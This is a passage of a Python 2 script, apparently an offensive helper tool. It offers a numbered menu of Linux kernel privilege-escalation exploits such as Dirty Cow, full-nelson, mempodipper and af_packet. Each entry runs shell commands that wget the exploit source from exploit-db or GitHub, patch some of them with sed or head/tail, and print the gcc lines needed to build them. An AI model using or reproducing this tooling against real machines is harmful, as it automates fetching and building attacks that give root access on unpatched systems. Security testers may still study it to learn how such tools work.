602 | run(commands) | |
603 | ||
604 | def can_bcm(): | |
605 | commands = [ | |
606 | ('Downloading...','wget https://www.exploit-db.com/download/14814 -O can_bcm_expl.c'), | |
607 | ('Compile with:','echo "gcc -o can_bcm_expl can_bcm_expl.c"') | |
608 | ] | |
609 | run(commands) | |
610 | ||
611 | def rdsProtocol(): | |
612 | commands = [ | |
613 | ('Downloading...','wget https://www.exploit-db.com/download/15285 -O rds_expl.c'), | |
614 | ('Compile with:','echo "gcc -o rds_expl rds_expl.c"') | |
615 | ] | |
616 | run(commands) | |
617 | ||
618 | def halfNelson(): | |
619 | commands = [ | |
620 | ('Downloading...','wget https://www.exploit-db.com/download/17787 -O half-nelson.c'), | |
621 | ('Compile with:','echo "gcc -o half-nelson half-nelson.c -lrt"') | |
622 | ] | |
623 | run(commands) | |
624 | ||
625 | def fullNelson(): | |
626 | commands = [ | |
627 | ('Downloading...','wget https://www.exploit-db.com/download/15704 -O full-nelson.c'), | |
628 | ('Compile with:','echo "gcc -o full-nelson full-nelson.c"') | |
629 | ] | |
630 | run(commands) | |
631 | ||
632 | def udev(): | |
633 | commands = [ | |
634 | ('Downloading...','wget https://www.exploit-db.com/download/8572 -O udev_expl.c'), | |
635 | ('Compile with:','echo "gcc -o udev_expl udev_expl.c"') | |
636 | ] | |
637 | run(commands) | |
638 | ||
639 | def sgid(): | |
640 | commands = [ | |
641 | ('Downloading...','wget https://www.exploit-db.com/download/33824 -O sgid_expl.c'), | |
642 | ('Compile with:','echo "gcc -o sgid_expl sgid_expl.c"') | |
643 | ] | |
644 | run(commands) | |
645 | ||
646 | def overlayfs_1(): | |
647 | commands = [ | |
648 | ('Downloading...','wget https://www.exploit-db.com/download/37292 -O overlayfs.c'), | |
649 | ('Compile with:','echo "gcc -o overlayfs overlayfs.c"') | |
650 | ] | |
651 | run(commands) | |
652 | ||
653 | def libfutex(): | |
654 | commands = [ | |
655 | ('Downloading...','wget https://www.exploit-db.com/download/35370 -O libfutex.c'), | |
656 | ('Compile with:','echo "gcc -o libfutex libfutex.c -lpthread"') | |
657 | ] | |
658 | run(commands) | |
659 | ||
660 | def mempodipper(): | |
661 | commands = [ | |
662 | ('Downloading...','wget https://www.exploit-db.com/download/18411 -O mempodipper.c'), | |
663 | ('Compile with:','echo "gcc -o mempodipper mempodipper.c"') | |
664 | ] | |
665 | run(commands) | |
666 | ||
667 | def alpha_omega(): | |
668 | commands = [ | |
669 | ('Downloading...','wget https://www.exploit-db.com/download/17391 -O alpha-omega.c'), | |
670 | ('Compile with:','echo "gcc -o alpha-omega alpha-omega.c"') | |
671 | ] | |
672 | run(commands) | |
673 | ||
674 | def dirtycow(): | |
675 | commands = [ | |
676 | ('Downloading...','wget https://www.exploit-db.com/download/40616 -O dirtycow_64.c'), | |
677 | ('Fixing...',"cp dirtycow_64.c dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/\/* 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 177;/unsigned int sc_len = 177; *\//g' dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/*\/ 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 136;/unsigned int sc_len = 136;\/*/g' dirtycow_32.c"), | |
678 | ('Compile with:','echo "gcc -o dirtycow_64 dirtycow_64.c -pthread"; echo "gcc -o dirtycow_32 dirtycow_32.c -pthread"') | |
679 | ] | |
680 | run(commands) | |
681 | ||
682 | def msr(): | |
683 | commands = [ | |
684 | ('Downloading...','wget https://www.exploit-db.com/download/27297 -O msr_expl.c'), | |
685 | ('Compile with:','echo "gcc -o msr_expl msr_expl.c"') | |
686 | ] | |
687 | run(commands) | |
688 | ||
689 | def perf_swevent_init(): | |
690 | commands = [ | |
691 | ('Downloading...','wget https://www.exploit-db.com/download/26131 -O perf.c'), | |
692 | ('Compile with:','echo "gcc -o perf perf.c"') | |
693 | ] | |
694 | run(commands) | |
695 | ||
696 | def overlayfs_2(): | |
697 | commands = [ | |
698 | ('Downloading...','wget https://www.exploit-db.com/download/39166 -O overlayfs.c'), | |
699 | ('Compile with:','echo "gcc -o overlayfs overlayfs.c"') | |
700 | ] | |
701 | run(commands) | |
702 | ||
703 | def overlayfs_3(): | |
704 | commands = [ | |
705 | ('Downloading...','wget https://www.exploit-db.com/download/39230 -O overlayfs.c'), | |
706 | ('Compile with:','echo "gcc -o overlayfs overlayfs.c"') | |
707 | ] | |
708 | run(commands) | |
709 | ||
710 | def af_packet(): | |
711 | commands = [ | |
712 | ('Downloading...','wget https://www.exploit-db.com/download/40871 -O af_packet.c'), | |
713 | ('Compile with: ','echo "gcc -o af_packet af_packet.c -lpthread"') | |
714 | ] | |
715 | run(commands) | |
716 | ||
717 | def double_fdput(): | |
718 | commands = [ | |
719 | ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip -O double_fdput.zip'), | |
720 | ('Unpacking...','unzip double_fdput.zip; cd 39772; tar xvf exploit.tar;'), | |
721 | ('Compile with: ','echo "cd 39772/ebpf_mapfd_doubleput_exploit; ./compile.sh"'), | |
722 | ('Run ./doubleput','') | |
723 | ] | |
724 | run(commands) | |
725 | ||
726 | def netfilter(): | |
727 | commands = [ | |
728 | ('Downloading...','wget https://www.exploit-db.com/download/40049 -O netfilter.c'), | |
729 | ('Fixing...','tail -n 50 netfilter.c > pwn.c; head -n 213 netfilter.c > intermediate.c; tail -n 208 intermediate.c > decr.c'), | |
730 | ('Compile with:','echo "gcc -o decr decr.c -m32 -O2; gcc pwn.c -O2 -o pwn"'), | |
731 | ('Run decr, then pwn',''), | |
732 | ('Cleaning up...','rm netfilter.c intermediate.c') | |
733 | ] | |
734 | run(commands) | |
735 | ||
736 | def refcount(): | |
737 | commands = [ | |
738 | ('Downloading...','wget https://www.exploit-db.com/download/39277 -O refcount.c'), | |
739 | ('Compile with:','echo "gcc -o refcount refcount.c -lkeyutils -Wall"') | |
740 | ] | |
741 | run(commands) | |
742 | ||
743 | exploits_linux_local = [ | |
744 | ("linux-exploit-suggester" , linux_exploit_suggester), | |
745 | ("unix_privesc_check" , unix_privesc_check), | |
746 | ("kernel 2.4.x / 2.6.x (sock_sendpage 1)" , sendpage_1), | |
747 | ("kernel 2.4 / 2.6 (sock_sendpage 2)" , sendpage_2), | |
748 | ("kernel < 2.6.22 (ftruncate)" , ftruncate), | |
749 | ("kernel < 2.6.34 (cap_sys_admin)" , cap_sys_admin), | |
750 | ("kernel 2.6.27 < 2.6.36 (compat)" , compat), | |
751 | ("kernel < 2.6.36-rc1 (can bcm)" , can_bcm), | |
752 | ("kernel <= 2.6.36-rc8 (rds protocol)" , rdsProtocol), | |
753 | ("*kernel < 2.6.36.2 (half nelson)" , halfNelson), | |
754 | ("*kernel <= 2.6.37 (full nelson)" , fullNelson), | |
755 | ("kernel 2.6 (udev)" , udev), | |
756 | ("kernel 3.13 (sgid)" , sgid), | |
757 | ("kernel 3.13.0 < 3.19 (overlayfs 1)" , overlayfs_1), | |
758 | ("kernel 3.14.5 (libfutex)" , libfutex), | |
759 | ("kernel 2.6.39 <= 3.2.2 (mempodipper)" , mempodipper), | |
760 | ("*kernel 2.6.28 / 3.0 (alpha-omega)" , alpha_omega), | |
761 | ("kernel 2.6.22 < 3.9 (Dirty Cow)" , dirtycow), | |
762 | ("kernel 3.7.6 (msr)" , msr), | |
763 | ("*kernel < 3.8.9 (perf_swevent_init)" , perf_swevent_init), | |
764 | ("kernel <= 4.3.3 (overlayfs 2)" , overlayfs_2), | |
765 | ("kernel 4.3.3 (overlayfs 3)" , overlayfs_3), | |
766 | ("kernel 4.4.0 (af_packet)" , af_packet), | |
767 | ("kernel 4.4.x (double-fdput)" , double_fdput), | |
768 | ("kernel 4.4.0-21 (netfilter)" , netfilter), | |
769 | ("*kernel 4.4.1 (refcount)" , refcount) | |
770 | ] | |
771 | ||
772 | # ------------------------------------ | |
773 | # UTILITY | |
774 | # ------------------------------------ | |
775 | ||
776 | def endpoints(i): | |
777 | try: | |
778 | i = int(i) | |
779 | except ValueError: | |
780 | return 0 | |
781 | if i <= 0: | |
782 | return 0 | |
783 | elif i == 1: | |
784 | return len(exploits_windows_remote) | |
785 | elif i == 2: | |
786 | return len(exploits_windows_remote) + len(exploits_windows_local) | |
787 | elif i == 3: | |
788 | return len(exploits_windows_remote) + len(exploits_windows_local) + len(exploits_linux_remote) | |
789 | elif i >= 4: | |
790 | return len(exploits_windows_remote) + len(exploits_windows_local) + len(exploits_linux_remote) + len(exploits_linux_local) | |
791 | ||
792 | def usage(): | |
793 | print "USAGE: %s <exploit id>" % sys.argv[0] | |
794 | print "\nWindows Remote Exploits:" | |
795 | for i in range(endpoints(0), endpoints(1)): | |
796 | print "%i: %s" % (i, exploits_windows_remote[i-endpoints(0)][0]) | |
797 | print "\nWindows Local Exploits:" | |
798 | for i in range(endpoints(1), endpoints(2)): | |
799 | print "%i: %s" % (i, exploits_windows_local[i-endpoints(1)][0]) | |
800 | print "\nLinux Remote Exploits:" | |
801 | for i in range(endpoints(2), endpoints(3)): | |
802 | print "%i: %s" % (i, exploits_linux_remote[i-endpoints(2)][0]) | |
803 | print "\nLinux Local Exploits:" | |
804 | for i in range(endpoints(3), endpoints(4)): | |
805 | print "%i: %s" % (i, exploits_linux_local[i-endpoints(3)][0]) | |
806 | ||
807 | def select(i): | |
808 | if i < 0 or i >= endpoints(4): | |
809 | return False | |
810 | ||
811 | if i < endpoints(1): | |
812 | printStep("Constructing %s" % exploits_windows_remote[i-endpoints(0)][0]) | |
813 | exploits_windows_remote[i-endpoints(0)][1]() | |
814 | elif i < endpoints(2): | |
815 | printStep("Constructing %s" % exploits_windows_local[i-endpoints(1)][0]) | |
816 | exploits_windows_local[i-endpoints(1)][1]() | |
817 | elif i < endpoints(3): | |
818 | printStep("Constructing %s" % exploits_linux_remote[i-endpoints(2)][0]) | |
819 | exploits_linux_remote[i-endpoints(2)][1]() | |
820 | elif i < endpoints(4): | |
821 | printStep("Constructing %s" % exploits_linux_local[i-endpoints(3)][0]) | |
822 | exploits_linux_local[i-endpoints(3)][1]() | |
823 | return True | |
824 | ||
825 | def run(commands): | |
826 | try: | |
827 | for c in commands: | |
828 | printStep(c[0]) | |
829 | subprocess.check_call(c[1], shell=True) | |
830 | except subprocess.CalledProcessError: | |
831 | printErr("Command failed") | |
832 | return False | |
833 | except OSError: | |
834 | printErr("Command failed") | |
835 | return False | |
836 | return True | |
837 | ||
838 | def printStep(s): | |
839 | print "%s [*] %s %s" % ('\033[93m', s, '\033[0m') | |
840 | ||
841 | def printErr(s): | |
842 | print "%s [!] %s %s" % ('\033[91m', s, '\033[0m') | |
843 | ||
844 | def printGood(s): | |
845 | print "%s [+] %s %s" % ('\033[92m', s, '\033[0m') | |
846 | ||
847 | # ------------------------------------ | |
848 | # MAIN | |
849 | # ------------------------------------ | |
850 | ||
851 | if len(sys.argv) <> 2: | |
852 | usage() | |
853 | sys.exit() | |
854 | ||
855 | try: | |
856 | success = select(int(sys.argv[1])) | |
857 | if not success: | |
858 | print "[-] Invalid selection: %s" % sys.argv[1] | |
859 | usage() | |
860 | except ValueError: | |
861 | print "[-] Invalid selection: %s" % sys.argv[1] | |
862 | usage() |